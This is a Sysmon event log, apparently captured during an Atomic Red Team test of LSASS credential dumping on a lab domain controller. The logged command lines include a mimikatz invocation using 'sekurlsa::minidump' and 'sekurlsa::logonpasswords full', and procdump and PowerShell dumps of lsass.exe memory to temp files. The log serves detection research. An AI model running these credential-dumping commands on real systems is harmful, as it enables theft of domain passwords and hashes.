21:10:25.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-A341-60D3-5B06-00000000CF01}47921608C:\Windows\system32\cmd.exe{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.079{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe2.2.0.0mimikatz for Windowsmimikatzgentilkiwi (Benjamin DELPY)mimikatz.exeC:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump C:\Users\ADMINI~1\AppData\Local\Temp\lsass.DMP" "sekurlsa::logonpasswords full" exit 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=3E8C35C224BB122C203AF18277E09C7F,SHA256=5046FAF90C1C5CC9B34F88807626A6AA162696CFE9F18F811A011AE6CBCD77E6,IMPHASH=C6431E6F73792143E85707738705EC33{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit" 10341000x800000000000000025662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.062{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.062{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 
10341000x800000000000000025660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:25.046{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.057{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %%tmp%%\lsass.DMP" "sekurlsa::logonpasswords full" exit" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=054F298A7BEB1555866A54A62CCEDB11,SHA256=63DF5104025B5552E91175E7C45E4CBC1575AC509D3116712A0E730FF8B64109,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000025716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.093{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000025715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:26.234{4DB9351A-A341-60D3-5E06-00000000CF01}63161948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c913ea7(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+6913|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+6818|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+c76b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+c7b25|C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\66e6de50ffc98a394cc7addf10a394da\mscorlib.ni.dll+59d884|C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\66e6de50ffc98a394cc7addf10a394da\mscorlib.ni.dll+5b51f2|UNKNOWN(00007FFF5B134B64) 11241100x800000000000000025714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.218{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lsass_628.dmp2021-06-23 21:10:26.218 10341000x800000000000000025713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:26.218{4DB9351A-A341-60D3-5E06-00000000CF01}63161948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B133C46) 23542300x800000000000000025712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.202{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E13601E4592CDBB90940EA9AA4FB7D35,SHA256=2B8213C134F729E55BAA7B4ED724B41F7947DFFB74AF46DCE668FD2818D2325C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.062{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=332EB56DB4C9BBA5E5316E7F1D617F15,SHA256=9ED03307AC350B8582D9C02FCAD9A0B79B2C102E4279EF80108B5B02C8404579,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.656{4DB9351A-A343-60D3-6106-00000000CF01}65965036C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+126c2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.546{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeC:\Windows\Temp\lsass_dump-1.dmp2021-06-23 21:10:27.546 10341000x800000000000000025762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.546{4DB9351A-A343-60D3-6106-00000000CF01}65965736C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000025761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:27.546{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 
10341000x800000000000000025760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-A343-60D3-6006-00000000CF01}65726100C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 